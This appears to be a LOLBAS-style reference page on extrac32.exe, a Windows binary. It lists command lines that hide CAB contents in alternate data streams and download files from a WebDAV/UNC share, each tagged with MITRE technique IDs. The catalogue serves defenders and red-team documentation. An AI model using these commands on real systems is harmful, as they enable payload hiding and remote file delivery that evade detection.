.. / Extrac32.exe
Star

Paths:

C:\Windows\System32\extrac32.exe
C:\Windows\SysWOW64\extrac32.exe

Resources:
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
https://twitter.com/egre55/status/985994639202283520

Acknowledgement:
egre55 - @egre55
Oddvar Moe - @oddvarmoe

Detection:

Alternate data streams

Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

Usecase:Extract data from cab file and hide it in an alternate data stream.
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1096

Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.

extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe

Usecase:Extract data from cab file and hide it in an alternate data stream.
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1096

Download

Copy the source file to the destination file and overwrite it.

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Usecase:Download file from UNC/WEBDav
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1105

.. / Extrac32.exe Star

Alternate data streams

Download

.. / Extrac32.exe
Star